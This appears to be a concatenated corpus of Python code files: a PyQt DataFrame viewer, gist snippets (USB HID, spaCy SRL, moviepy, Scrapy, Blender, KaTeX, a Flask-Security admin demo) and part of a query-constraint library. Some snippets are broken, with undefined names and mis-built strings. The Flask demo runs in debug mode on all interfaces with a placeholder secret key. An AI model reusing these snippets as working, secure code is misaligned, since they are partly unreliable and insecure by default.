if isinstance(data, WidgetedCell):
# Make new widget
widget_class = data.widget
# Give out widget our cell parent so it knows where to paint
widget = widget_class(parent)
try:
# Find existing widget if we can
widget_state = self._cell_widget_states[true_index]
except KeyError:
pass
else:
try:
widget.setWidgetedCellState(widget_state)
except AttributeError:
# Not implementing the WidgetedCell interface
pass
return widget
else:
return super(DataFrameItemDelegate, self).createEditor(parent, option, index)
def setModelData(self, widget, model, index):
# Try to save the state of the widget
try:
widget_state = widget.getWidgetedCellState()
except AttributeError:
# Not implementing the WidgetedCell interface
return
true_index = index.data(DataFrameModel.RawIndexRole)
self._cell_widget_states[true_index] = widget_state
def paint(self, painter, option, index):
d = index.data(DataFrameModel.RawDataRole)
if isinstance(d, WidgetedCell):
# Don't paint, create editor instead
return None
else:
return super(DataFrameItemDelegate, self).paint(painter, option, index)
class DataFrameWidget(QtGui.QTableView):
dataFrameChanged = QtCore.pyqtSignal()
cellClicked = QtCore.pyqtSignal(int, int)
def __init__(self, parent=None, df=None):
"""DataFrameTable
Create a widget to display a pandas DataFrame.
Args:
parent (QObject)
Parent object (likely window or canvas)
df (pandas DataFrame, optional)
DataFrame to display
"""
super(DataFrameWidget, self).__init__(parent)
self.defaultExcelFile = "temp.xls"
self.defaultExcelSheet = "Output"
# Set up view
self._data_model = DataFrameModel()
self.setModel(self._data_model)
# Signals/Slots
self._data_model.modelReset.connect(self.dataFrameChanged)
self._data_model.dataChanged.connect(self.dataFrameChanged)
self.clicked.connect(self._on_click)
self.dataFrameChanged.connect(self._enable_widgeted_cells)
# Set up delegate Delegate
delegate = DataFrameItemDelegate()
self.setItemDelegate(delegate)
# Show the edit widget as soon as the user clicks in the cell
# (needed for item delegate)
self.setEditTriggers(self.CurrentChanged)
# Initilize to passed dataframe
if df is None:
df = pandas.DataFrame()
self._data_model.setDataFrame(df)
#self.setSortingEnabled(True)
# Create header menu bindings
self.horizontalHeader().setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.horizontalHeader().customContextMenuRequested.connect(self._header_menu)
self._enable_widgeted_cells()
def make_cell_context_menu(self, menu, row_ix, col_ix):
"""Create the mneu displayed when right-clicking on a cell.
Overrite this method to add custom right-click options
Args:
menu (QMenu)
Menu to which to add actions
row_ix (int)
Row location in dataframe
col_ix (int)
Coloumn location in dataframe
Returns:
menu (QMenu)
Same menu passed in, with added actions
"""
cell_val = self.df.iget_value(row_ix, col_ix)
# Quick Filter
def _quick_filter(s_col):
return s_col == cell_val
menu.addAction(self._icon('CommandLink'),
"Quick Filter", partial(self._data_model.filterFunction, col_ix=col_ix, function=_quick_filter))
# GreaterThan/LessThan filter
def _cmp_filter(s_col, op):
return op(s_col, cell_val)
menu.addAction("Show Greater Than",
partial(self._data_model.filterFunction, col_ix=col_ix,
function=partial(_cmp_filter, op=operator.ge)))
menu.addAction("Show Less Than",
partial(self._data_model.filterFunction, col_ix=col_ix,
function=partial(_cmp_filter, op=operator.le)))
menu.addAction(self._icon('DialogResetButton'),
"Clear",
self._data_model.reset)
menu.addSeparator()
# Save to Excel
def _to_excel():
from subprocess import Popen
self.df.to_excel(self.defaultExcelFile, self.defaultExcelSheet)
Popen(self.defaultExcelFile, shell=True)
menu.addAction("Open in Excel",
_to_excel)
return menu
def contextMenuEvent(self, event):
"""Implements right-clicking on cell.
NOTE: You probably want to overrite make_cell_context_menu, not this
function, when subclassing.
"""
row_ix = self.rowAt(event.y())
col_ix = self.columnAt(event.x())
if row_ix < 0 or col_ix < 0:
return #out of bounds
menu = QtGui.QMenu(self)
menu = self.make_cell_context_menu(menu, row_ix, col_ix)
menu.exec_(self.mapToGlobal(event.pos()))
def _header_menu(self, pos):
"""Create popup menu used for header"""
menu = QtGui.QMenu(self)
col_ix = self.horizontalHeader().logicalIndexAt(pos)
if col_ix == -1:
# Out of bounds
return
# Filter Menu Action
menu.addAction(DynamicFilterMenuAction(self, menu, col_ix))
menu.addAction(FilterListMenuWidget(self, menu, col_ix))
menu.addAction(self._icon('DialogResetButton'),
"Reset",
self._data_model.reset)
# Sort Ascending/Decending Menu Action
menu.addAction(self._icon('TitleBarShadeButton'),
"Sort Ascending",
partial(self._data_model.sort, col_ix=col_ix, order=QtCore.Qt.AscendingOrder))
menu.addAction(self._icon('TitleBarUnshadeButton'),
"Sort Descending",
partial(self._data_model.sort, col_ix=col_ix, order=QtCore.Qt.DescendingOrder))
menu.addSeparator()
# Hide
menu.addAction("Hide", partial(self.hideColumn, col_ix))
# Show (column to left and right)
for i in (-1, 1):
if self.isColumnHidden(col_ix+i):
menu.addAction("Show %s" % self._data_model.headerData(col_ix+i, QtCore.Qt.Horizontal),
partial(self.showColumn, col_ix+i))
menu.exec_(self.mapToGlobal(pos))
def setDataFrame(self, df):
self._data_model.setDataFrame(df)
self.resizeColumnsToContents()
def filter(self, col_ix, needle):
return self._data_model.filter(col_ix, needle)
def filterIsIn(self, col_ix, include):
return self._data_model.filterIsIn(col_ix, include)
@property
def df(self):
return self._data_model.df
@df.setter
def df(self, dataFrame):
# Use the "hard setting" of the dataframe because anyone who's interacting with the
# DataFrameWidget (ie, end user) would be setting this
self._data_model.setDataFrame(dataFrame)
def keyPressEvent(self, event):
"""Implements keyboard shortcuts"""
if event.matches(QtGui.QKeySequence.Copy):
self.copy()
else:
# Pass up
super(DataFrameWidget, self).keyPressEvent(event)
def copy(self):
"""Copy selected cells into copy-buffer"""
selection = self.selectionModel()
indexes = selection.selectedIndexes()
if len(indexes) < 1:
# Nothing selected
return
# Capture selection into a DataFrame
items = pandas.DataFrame()
for idx in indexes:
row = idx.row()
col = idx.column()
item = idx.data()
if item:
items = items.set_value(row, col, str(item.toString()))
# Make into tab-delimited text (best for Excel)
items = list(items.itertuples(index=False))
s = '\n'.join(['\t'.join([cell for cell in row]) for row in items])
# Send to clipboard
QtGui.QApplication.clipboard().setText(s)
def _icon(self, icon_name):
"""Convinence function to get standard icons from Qt"""
if not icon_name.startswith('SP_'):
icon_name = 'SP_' + icon_name
icon = getattr(QtGui.QStyle, icon_name, None)
if icon is None:
raise Exception("Unknown icon %s" % icon_name)
return self.style().standardIcon(icon)
def _on_click(self, index):
if index.isValid():
self.cellClicked.emit(index.row(), index.column())
def _enable_widgeted_cells(self):
# Update all cells with WidgetedCell to have persistent editors
model = self.model()
if model is None:
return
for r in xrange(model.rowCount()):
for c in xrange(model.columnCount()):
idx = model.index(r,c)
d = model.data(idx, DataFrameModel.RawDataRole)
if isinstance(d, WidgetedCell):
self.openPersistentEditor(idx)
class DataFrameApp(QtGui.QMainWindow):
"""Sample DataFrameTable Application"""
def __init__(self, df, title="Inspecting DataFrame"):
super(DataFrameApp, self).__init__()
# State variables
self.title_base = title
# Initialize main data table
self.table = DataFrameWidget(self)
self.table.dataFrameChanged.connect(self.datatable_updated)
self.table.setDataFrame(df)
self.setCentralWidget(self.table)
# Set window size
col_size = sum([self.table.columnWidth(i) for i in range(0,99)])
col_size = min(col_size+75, 1500)
self.setGeometry(300, 300, col_size, 250)
def datatable_updated(self):
# Change title to reflect updated size
df = self.table.df
title = self.title_base + ' [%dx%d]' % (len(df.index), len(df.columns))
self.setWindowTitle(title)
class ExampleWidgetForWidgetedCell(QtGui.QComboBox):
"""
To implement a persistent state for the widgetd cell, you must provide
a `getWidgetedCellState` and `setWidgetedCellState` methods. This is how
the WidgetedCell framework can create and destory your widget as needed.
"""
def __init__(self, parent):
super(ExampleWidgetForWidgetedCell, self).__init__(parent)
self.addItem("Option A")
self.addItem("Option B")
self.addItem("Option C")
self.setCurrentIndex(0)
def getWidgetedCellState(self):
return self.currentIndex()
def setWidgetedCellState(self, state):
self.setCurrentIndex(state)
if __name__ == '__main__':
# Create a quick example
_app = QtGui.QApplication(sys.argv)
import string
import random
rnd_txt = lambda: "".join( [random.choice(string.letters[:26]) for i in xrange(15)] )
df = [['a','b','c']*3]
for j in xrange(5):
r = []
for k in xrange(6):
r.append(rnd_txt())
r.append(random.randint(1,20))
r.append(random.random()*10)
r.append(WidgetedCell(ExampleWidgetForWidgetedCell))
df.append(r)
df = pandas.DataFrame(df, columns=['AAA','BBB','CCC','DDD','EEE','FFF','GGG','HHH','III'])
app = DataFrameApp(df)
app.show()
_app.exec_()
```
#### File: hard-gists/f6effc4468cca6f4e8f0/snippet.py
```python
import os
import sys
import usb.core
import usb.util
from time import sleep
import random
# handler called when a report is received
def rx_handler(data):
print 'recv: ', data
def findHIDDevice(mbed_vendor_id, mbed_product_id):
# Find device
hid_device = usb.core.find(idVendor=mbed_vendor_id,idProduct=mbed_product_id)
if not hid_device:
print "No device connected"
else:
sys.stdout.write('mbed found\n')
if hid_device.is_kernel_driver_active(0):
try:
hid_device.detach_kernel_driver(0)
except usb.core.USBError as e:
sys.exit("Could not detatch kernel driver: %s" % str(e))
try:
hid_device.set_configuration()
hid_device.reset()
except usb.core.USBError as e:
sys.exit("Could not set configuration: %s" % str(e))
endpoint = hid_device[0][(0,0)][0]
while True:
data = [0x0] * 16
#read the data
bytes = hid_device.read(endpoint.bEndpointAddress, 8)
rx_handler(bytes);
for i in range(8):
data[i] = bytes[i]
data[i+8] = random.randint(0, 255)
hid_device.write(1, data)
if __name__ == '__main__':
# The vendor ID and product ID used in the Mbed program
mbed_vendor_id = 0x1234
mbed_product_id = 0x0006
# Search the Mbed, attach rx handler and send data
findHIDDevice(mbed_vendor_id, mbed_product_id)
```
#### File: hard-gists/f788cfd227cb94d0843235a2542026fd/snippet.py
```python
from allennlp.commands import DEFAULT_MODELS
from allennlp.common.file_utils import cached_path
from allennlp.service.predictors import SemanticRoleLabelerPredictor
from allennlp.models.archival import load_archive
import spacy
from spacy.tokens import Token
class SRLComponent(object):
'''
A SpaCy pipeline component for SRL
'''
name = 'Semantic Role Labeler'
def __init__(self):
archive = load_archive(self._get_srl_model())
self.predictor = SemanticRoleLabelerPredictor.from_archive(archive, "semantic-role-labeling")
Token.set_extension('srl_arg0')
Token.set_extension('srl_arg1')
def __call__(self, doc):
# See https://github.com/allenai/allennlp/blob/master/allennlp/service/predictors/semantic_role_labeler.py#L74
words = [token.text for token in doc]
for i, word in enumerate(doc):
if word.pos_ == "VERB":
verb = word.text
verb_labels = [0 for _ in words]
verb_labels[i] = 1
instance = self.predictor._dataset_reader.text_to_instance(doc, verb_labels)
output = self.predictor._model.forward_on_instance(instance, -1)
tags = output['tags']
# TODO: Tagging/dependencies can be done more elegant
if "B-ARG0" in tags:
start = tags.index("B-ARG0")
end = max([i for i, x in enumerate(tags) if x == "I-ARG0"] + [start]) + 1
word._.set("srl_arg0", doc[start:end])
if "B-ARG1" in tags:
start = tags.index("B-ARG1")
end = max([i for i, x in enumerate(tags) if x == "I-ARG1"] + [start]) + 1
word._.set("srl_arg1", doc[start:end])
return doc
def _get_srl_model(self):
return cached_path(DEFAULT_MODELS['semantic-role-labeling'])
def demo():
nlp = spacy.load("en")
nlp.add_pipe(SRLComponent(), after='ner')
doc = nlp("Apple sold 1 million Plumbuses this month.")
for w in doc:
if w.pos_ == "VERB":
print("('{}', '{}', '{}')".format(w._.srl_arg0, w, w._.srl_arg1))
# ('Apple', 'sold', '1 million Plumbuses)
```
#### File: hard-gists/fa43af59f3ecf9b10c88/snippet.py
```python
from pylab import *
import moviepy.editor as mp
from moviepy.video.io.bindings import mplfig_to_npimage
# PARAMETERS OF THE CURVE AND THE GIF
curve = lambda t : ( cos(80*t) - cos(t)**3, sin(t) - sin(80*t)**3 )
curve_latex = (r"$\left(\,\, \cos(80t) - \cos(t^3),\,\,\,"
+r"\sin(t) - \sin(80t)^3 \,\,\right)$")
t_min=0
t_max = 2*pi
number_of_points = 20000
gif_name = "test.gif"
gif_duration = 5
gif_fps = 15
# PRECOMPUTE THE CURVE
times = linspace(0, 2*pi, number_of_points)
curve_x, curve_y = zip(*[curve(t) for t in times])
# INITIALIZE THE FIGURE
fig, ax = subplots(1, figsize=(4,4), facecolor='white')
ax.axis("off")
ax.set_title(fun_latex)
line, = ax.plot(curve_x, curve_y)
# ANIMATE WITH MOVIEPY
def make_frame(t):
index_max = int( (1.0*t/clip_duration)*number_of_points)
line.set_xdata(curve_x[:index_max])
line.set_ydata(curve_y[:index_max])
return mplfig_to_npimage(fig)
clip = mp.VideoClip(make_frame, duration=gif_duration)
clip = clip.fx( mp.vfx.freeze, t='end', freeze_duration=1)
clip.write_gif(gif_name, fps=gif_fps)
```
#### File: hard-gists/fc1527d6d9492b59c610/snippet.py
```python
import json
from scrapy.crawler import Crawler
from scrapy.contrib.loader import ItemLoader
from scrapy.contrib.loader.processor import Join, MapCompose, TakeFirst
from scrapy import log, signals, Spider, Item, Field
from scrapy.settings import Settings
from twisted.internet import reactor
# define an item class
class DmozItem(Item):
title = Field()
link = Field()
desc = Field()
# define an item loader with input and output processors
class DmozItemLoader(ItemLoader):
default_input_processor = MapCompose(unicode.strip)
default_output_processor = TakeFirst()
desc_out = Join()
# define a pipeline
class JsonWriterPipeline(object):
def __init__(self):
self.file = open('items.jl', 'wb')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line)
return item
# define a spider
class DmozSpider(Spider):
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/",
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
for sel in response.xpath('//ul/li'):
loader = DmozItemLoader(DmozItem(), selector=sel, response=response)
loader.add_xpath('title', 'a/text()')
loader.add_xpath('link', 'a/@href')
loader.add_xpath('desc', 'text()')
yield loader.load_item()
# callback fired when the spider is closed
def callback(spider, reason):
stats = spider.crawler.stats.get_stats() # collect/log stats?
# stop the reactor
reactor.stop()
# instantiate settings and provide a custom configuration
settings = Settings()
settings.set('ITEM_PIPELINES', {
'__main__.JsonWriterPipeline': 100
})
# instantiate a crawler passing in settings
crawler = Crawler(settings)
# instantiate a spider
spider = DmozSpider()
# configure signals
crawler.signals.connect(callback, signal=signals.spider_closed)
# configure and start the crawler
crawler.configure()
crawler.crawl(spider)
crawler.start()
# start logging
log.start()
# start the reactor (blocks execution)
reactor.run()
```
#### File: hard-gists/fd65891daf183d99d91cb83b89e2a4c7/snippet.py
```python
bl_info = {
"name": "lathe",
"author": "<NAME>",
"version": (0, 9,3),
"blender": (2, 78, 0),
"location": "Add > Mesh",
"description": "Create a lathe",
"warning": "",
"wiki_url": "",
"category": "Add Mesh",
}
import bpy
def main(context):
for ob in context.scene.objects:
print(ob)
#Define functions for modifiers stack
def modifierstack():
#create screw modifier and setup
bpy.ops.object.modifier_add(type='SCREW')
bpy.context.object.modifiers["Screw"].steps = 64
bpy.context.object.modifiers["Screw"].render_steps = 64
bpy.context.object.modifiers["Screw"].use_normal_flip = True
#create solidify modifier and setup
bpy.ops.object.modifier_add(type='SOLIDIFY')
bpy.context.object.modifiers["Solidify"].thickness = 0.1
#create edgesplit modifier and setup
bpy.ops.object.modifier_add(type='EDGE_SPLIT')
bpy.context.object.modifiers["EdgeSplit"].show_viewport = False
bpy.context.object.modifiers["EdgeSplit"].show_render = False
#classe lathe
class lathe(bpy.types.Operator):
"""Create a lathe object"""
bl_idname = "object.lathe"
bl_label = "Lathe"
bl_options = {'REGISTER', 'UNDO'}
def invoke(self, context, event):
#init front view, create a cube, name it, toggle edit mode and delete all to start from scratch
bpy.ops.view3d.viewnumpad(type='FRONT')
bpy.ops.mesh.primitive_cube_add(radius=1, view_align=False, enter_editmode=False, location=(0, 0, 0), layers=(True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False))
bpy.context.object.name = "Lathe"
bpy.ops.object.editmode_toggle()
bpy.ops.mesh.delete(type='VERT')
#create first vertex at cursor
bpy.ops.mesh.primitive_vert_add()
modifierstack()
bpy.context.object.modifiers["Screw"].use_normal_calculate = True
return {'FINISHED'}
#classe lathe_libre
class lathe_libre(bpy.types.Operator):
"""Create a lathe object with free draw"""
bl_idname = "object.lathe_libre"
bl_label = "Lathe_libre"
bl_options = {'REGISTER', 'UNDO'}
def invoke(self, context, event):
#init front view, create a curve, name it, toggle edit mode and delete all to start from scratch
bpy.ops.view3d.viewnumpad(type='FRONT')
bpy.ops.curve.primitive_bezier_curve_add(view_align=False, enter_editmode=False, location=(0, 0, 0), layers=(True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False))
bpy.context.object.name = "Lathe_libre"
bpy.ops.object.editmode_toggle()
bpy.ops.curve.delete(type='VERT')
modifierstack()
return {'FINISHED'}
#definition of the names and operators
def menu_item(self, context):
self.layout.operator(lathe.bl_idname, text="lathe", icon="PLUGIN")
self.layout.operator(lathe_libre.bl_idname, text="lathe_libre", icon="PLUGIN")
#add the names and operators to mesh add menu
def register():
bpy.utils.register_module(__name__)
bpy.types.INFO_MT_mesh_add.append(menu_item)
#Unregister the names and operators from mesh add menu
def unregister():
bpy.utils.unregister_module(__name__)
bpy.types.INFO_MT_mesh_add.remove(menu_item)
if __name__ == "__main__":
register()
```
#### File: hard-gists/fe4fd5f27a4811cb0187/snippet.py
```python
import re
import execjs
def find_equations(string):
""" Take in a string, and convert everything between $ ... $ into an inline
equation and everything between $$ ... $$ into a centred equation. """
doubledollar = re.compile(ur"\$\$([^$]+)\$\$")
singledollar = re.compile(ur"(?<![\$])\$([^$]+)\$(?!\$)")
inline_equations = re.findall(singledollar, string)
centred_equations = re.findall(doubledollar, string)
return inline_equations, centred_equations
def remove_dollars(string):
""" Takes equation delimited by dollars as input, and removes the dollar
signs at the beginning and end. """
return re.sub("[\$]", "", string)
def import_katex():
""" Imports katex into the local namespace for use as
`katex.call("katex.renderToString", "E = mc^2") """
source = open("lib/katex.js").read()
katex = execjs.compile(source)
return True
def eqn_to_html(eqn_string):
""" Takes equation string, e.g. "E = mc^2", and outputs KaTeX HTML """
try:
return katex.call("katex.renderToString", "E = mc^2")
except ReferenceError:
print "Error rendering KaTeX HTML. Please ensure that you have",
print "imported KaTeX into the Python namespace."
return False
def replace_eqn(string):
""" Takes a block of text, finds the equations and replaces the text with
HTML code """
pass
with open("katex_markdown.md") as f:
original_content = f.read()
import_katex()
inline, centred = remove_dollars(find_equations(original_content))
head = """<head>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="lib/katex.min.css">
</head>
"""
body = """<body>
""", content, """
</body>
"""
html = """<!DOCTYPE HTML>
<html>
""", head, """
""", body, """
</html>
"""
with open("katexpage.html", 'w') as f:
f.write(html)
```
#### File: hard-gists/ffb1b5f12d7ad787f6e4/snippet.py
```python
from flask import Flask, render_template
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.security import current_user, login_required, RoleMixin, Security, \
SQLAlchemyUserDatastore, UserMixin, utils
from flask_mail import Mail
from flask.ext.admin import Admin
from flask.ext.admin.contrib import sqla
from wtforms.fields import PasswordField
# Initialize Flask and set some config values
app = Flask(__name__)
app.config['DEBUG']=True
# Replace this with your own secret key
app.config['SECRET_KEY'] = 'super-secret'
# The database must exist (although it's fine if it's empty) before you attempt to access any page of the app
# in your browser.
# I used a PostgreSQL database, but you could use another type of database, including an in-memory SQLite database.
# You'll need to connect as a user with sufficient privileges to create tables and read and write to them.
# Replace this with your own database connection string.
#xxxxx
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:xxxxxxxx@localhost/flask_example'
# Set config values for Flask-Security.
# We're using PBKDF2 with salt.
app.config['SECURITY_PASSWORD_HASH'] = '<PASSWORD>'
# Replace this with your own salt.
app.config['SECURITY_PASSWORD_SALT'] = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
# Flask-Security optionally sends email notification to users upon registration, password reset, etc.
# It uses Flask-Mail behind the scenes.
# Set mail-related config values.
# Replace this with your own "from" address
app.config['SECURITY_EMAIL_SENDER'] = '<EMAIL>'
# Replace the next five lines with your own SMTP server settings
app.config['MAIL_SERVER'] = 'email-smtp.us-west-2.amazonaws.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'xxxxxxxxxxxxxxxxxxxx'
app.config['MAIL_PASSWORD'] = '<PASSWORD>'
# Initialize Flask-Mail and SQLAlchemy
mail = Mail(app)
db = SQLAlchemy(app)
# Create a table to support a many-to-many relationship between Users and Roles
roles_users = db.Table(
'roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
# Role class
class Role(db.Model, RoleMixin):
# Our Role has three fields, ID, name and description
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
# __str__ is required by Flask-Admin, so we can have human-readable values for the Role when editing a User.
# If we were using Python 2.7, this would be __unicode__ instead.
def __str__(self):
return self.name
# __hash__ is required to avoid the exception TypeError: unhashable type: 'Role' when saving a User
def __hash__(self):
return hash(self.name)
# User class
class User(db.Model, UserMixin):
# Our User has six fields: ID, email, password, active, confirmed_at and roles. The roles field represents a
# many-to-many relationship using the roles_users table. Each user may have no role, one role, or multiple roles.
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship(
'Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic')
)
# Initialize the SQLAlchemy data store and Flask-Security.
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
# Executes before the first request is processed.
@app.before_first_request
def before_first_request():
# Create any database tables that don't exist yet.
db.create_all()
# Create the Roles "admin" and "end-user" -- unless they already exist
user_datastore.find_or_create_role(name='admin', description='Administrator')
user_datastore.find_or_create_role(name='end-user', description='End user')
# Create two Users for testing purposes -- unless they already exists.
# In each case, use Flask-Security utility function to encrypt the password.
encrypted_password = utils.encrypt_password('password')
if not user_datastore.get_user('<EMAIL>'):
user_datastore.create_user(email='<EMAIL>', password=<PASSWORD>)
if not user_datastore.get_user('<EMAIL>'):
user_datastore.create_user(email='<EMAIL>', password=encrypted_password)
# Commit any database changes; the User and Roles must exist before we can add a Role to the User
db.session.commit()
# Give one User has the "end-user" role, while the other has the "admin" role. (This will have no effect if the
# Users already have these Roles.) Again, commit any database changes.
user_datastore.add_role_to_user('<EMAIL>', 'end-user')
user_datastore.add_role_to_user('<EMAIL>', 'admin')
db.session.commit()
# Displays the home page.
@app.route('/')
# Users must be authenticated to view the home page, but they don't have to have any particular role.
# Flask-Security will display a login form if the user isn't already authenticated.
@login_required
def index():
return render_template('index.html')
# Customized User model for SQL-Admin
class UserAdmin(sqla.ModelView):
# Don't display the password on the list of Users
column_exclude_list = list = ('password',)
# Don't include the standard password field when creating or editing a User (but see below)
form_excluded_columns = ('password',)
# Automatically display human-readable names for the current and available Roles when creating or editing a User
column_auto_select_related = True
# Prevent administration of Users unless the currently logged-in user has the "admin" role
def is_accessible(self):
return current_user.has_role('admin')
# On the form for creating or editing a User, don't display a field corresponding to the model's password field.
# There are two reasons for this. First, we want to encrypt the password before storing in the database. Second,
# we want to use a password field (with the input masked) rather than a regular text field.
def scaffold_form(self):
# Start with the standard form as provided by Flask-Admin. We've already told Flask-Admin to exclude the
# password field from this form.
form_class = super(UserAdmin, self).scaffold_form()
# Add a password field, naming it "password2" and labeling it "New Password".
form_class.password2 = PasswordField('<PASSWORD>')
return form_class
# This callback executes when the user saves changes to a newly-created or edited User -- before the changes are
# committed to the database.
def on_model_change(self, form, model, is_created):
# If the password field isn't blank...
if len(model.password2):
# ... then encrypt the new password prior to storing it in the database. If the password field is blank,
# the existing password in the database will be retained.
model.password = utils.encrypt_password(model.password2)
# Customized Role model for SQL-Admin
class RoleAdmin(sqla.ModelView):
# Prevent administration of Roles unless the currently logged-in user has the "admin" role
def is_accessible(self):
return current_user.has_role('admin')
# Initialize Flask-Admin
admin = Admin(app)
# Add Flask-Admin views for Users and Roles
admin.add_view(UserAdmin(User, db.session))
admin.add_view(RoleAdmin(Role, db.session))
# If running locally, listen on all IP addresses, port 8080
if __name__ == '__main__':
app.run(
host='0.0.0.0',
port=int('8080'),
debug=app.config['DEBUG']
)
``` |
{
"source": "jjhenkel/nteract",
"score": 3
} |
#### File: codebook/csharp/constraints.py
```python
import os
class CBName:
_kind = 'C#.Constraints.Name'
def __init__(self, value):
self.kind = CBName._kind
self.value = value
self.precedence = 6
def __str__(self):
return 'name=`{}`'.format(self.value)
def to_path(self, path):
return '"{}"={}'.format(self.value, path)
@staticmethod
def kind():
return CBName._kind
class CBSameText:
_kind = 'C#.Constraints.SameText'
def __init__(self, value):
self.kind = CBSameText._kind
self.value = value
def __str__(self):
return 'text_same_as=`{}`'.format(self.value)
@staticmethod
def kind():
return CBSameText._kind
class CBExactlyTwoChildren:
_kind = 'C#.Constraints.ExactlyTwoChildren'
def __init__(self):
self.kind = CBExactlyTwoChildren._kind
def __str__(self):
return 'child_count=2'
@staticmethod
def kind():
return CBExactlyTwoChildren._kind
class CBExactlyTwoNormalArgs:
_kind = 'C#.Constraints.ExactlyTwoNormalArgs'
def __init__(self):
self.kind = CBExactlyTwoNormalArgs._kind
def __str__(self):
return 'normal_args=2'
@staticmethod
def kind():
return CBExactlyTwoNormalArgs._kind
class CBEveryChildHasType:
_kind = 'C#.Constraints.EveryChildHasType'
def __init__(self, value):
self.kind = CBEveryChildHasType._kind
self.value = value
def __str__(self):
return 'every_child_type=`{}`'.format(self.value)
@staticmethod
def kind():
return CBEveryChildHasType._kind
class CBText:
_kind = 'C#.Constraints.Text'
def __init__(self, value):
self.kind = CBText._kind
self.value = value
self.precedence = 7
def __str__(self):
return 'text=`{}`'.format(self.value)
@staticmethod
def kind():
return CBText._kind
class CBFieldIndex:
_kind = 'C#.Constraints.FieldIndex'
def __init__(self, field, index=None):
self.kind = CBFieldIndex._kind
self.field = field
self.index = index
assert self.field is not None or self.index is not None
self.precedence = 8
def __str__(self):
if self.field is not None and self.index is not None:
return '$.f_{}[{}]'.format(self.field, self.index)
elif self.field is not None:
return '$.f_{}'.format(self.field)
elif self.index is not None:
return '$.[{}]'.format(self.index)
else:
assert False
@staticmethod
def kind():
return CBFieldIndex._kind
class CBStepsAway:
_kind = 'C#.Constraints.StepsAway'
def __init__(self, steps, op=None):
self.kind = CBStepsAway._kind
self.steps = steps
self.op = op
self.precedence = 9
def __str__(self):
if self.op is None:
return '$steps_away{}'
else:
return '$steps_away{{{}{}}}'.format(self.op, self.steps)
@staticmethod
def kind():
return CBStepsAway._kind
class CBAllowCastsAndParens:
_kind = 'C#.Constraints.AllowCastsAndParens'
def __init__(self, max_depth = None):
self.kind = CBAllowCastsAndParens._kind
self.max_depth = max_depth
self.precedence = -1
def __str__(self):
if self.max_depth is None:
return '$allow_casts_and_parens'
else:
return '$allow_casts_and_parens[<={}]'.format(self.max_depth)
@staticmethod
def kind():
return CBAllowCastsAndParens._kind
class CBFromSet:
_kind = 'C#.Constraints.FromSet'
def __init__(self, frame, files=None):
self.kind = CBFromSet._kind
self.frame = frame
self.file = None
self.files_constraint = files
def __str__(self):
return '$from_set'
def write_file(self, path):
self.file = path
os.makedirs(os.path.dirname(self.file), exist_ok=True)
self.frame.to_csv(self.file, index=False, header=False, sep='\t')
@staticmethod
def kind():
return CBFromSet._kind
```
#### File: codebookold/python/modifiers.py
```python
class CBRhs:
_kind = 'Python.Mods.TheRhs'
def __init__(self):
self.kind = CBRhs._kind
def __str__(self):
return '$the_rhs'
@staticmethod
def kind():
return CBRhs._kind
class CBLhs:
_kind = 'Python.Mods.TheLhs'
def __init__(self):
self.kind = CBLhs._kind
def __str__(self):
return '$the_lhs'
@staticmethod
def kind():
return CBLhs._kind
class CBValueIs:
_kind = 'Python.Mods.ValueIs'
def __init__(self):
self.kind = CBValueIs._kind
def __str__(self):
return '$value_is'
@staticmethod
def kind():
return CBValueIs._kind
class CBFirstArgIs:
_kind = 'Python.Mods.FirstArgIs'
def __init__(self):
self.kind = CBFirstArgIs._kind
def __str__(self):
return '$first_arg'
@staticmethod
def kind():
return CBFirstArgIs._kind
class CBSecondArgIs:
_kind = 'Python.Mods.SecondArgIs'
def __init__(self):
self.kind = CBSecondArgIs._kind
def __str__(self):
return '$second_arg'
@staticmethod
def kind():
return CBSecondArgIs._kind
class CBSubscriptIs:
_kind = 'Python.Mods.SubscriptIs'
def __init__(self):
self.kind = CBSubscriptIs._kind
def __str__(self):
return '$subscript_is'
@staticmethod
def kind():
return CBSubscriptIs._kind
class CBAttributeIs:
_kind = 'Python.Mods.AttributeIs'
def __init__(self):
self.kind = CBAttributeIs._kind
def __str__(self):
return '$attribute_is'
@staticmethod
def kind():
return CBAttributeIs._kind
class CBObjectIs:
_kind = 'Python.Mods.ObjectIs'
def __init__(self):
self.kind = CBObjectIs._kind
def __str__(self):
return '$object_is'
@staticmethod
def kind():
return CBObjectIs._kind
class CBOnlySubscriptIs:
_kind = 'Python.Mods.OnlySubscriptIs'
def __init__(self):
self.kind = CBOnlySubscriptIs._kind
def __str__(self):
return '$only_subscript_is'
@staticmethod
def kind():
return CBOnlySubscriptIs._kind
class CBAnyArgIs:
_kind = 'Python.Mods.AnyArgIs'
def __init__(self):
self.kind = CBAnyArgIs._kind
def __str__(self):
return '$any_arg_is'
@staticmethod
def kind():
return CBAnyArgIs._kind
class CBAnyParentIs:
_kind = 'Python.Mods.AnyParentIs'
def __init__(self):
self.kind = CBAnyParentIs._kind
def __str__(self):
return '$any_parent_is'
@staticmethod
def kind():
return CBAnyParentIs._kind
class CBUses:
_kind = 'Python.Mods.Uses'
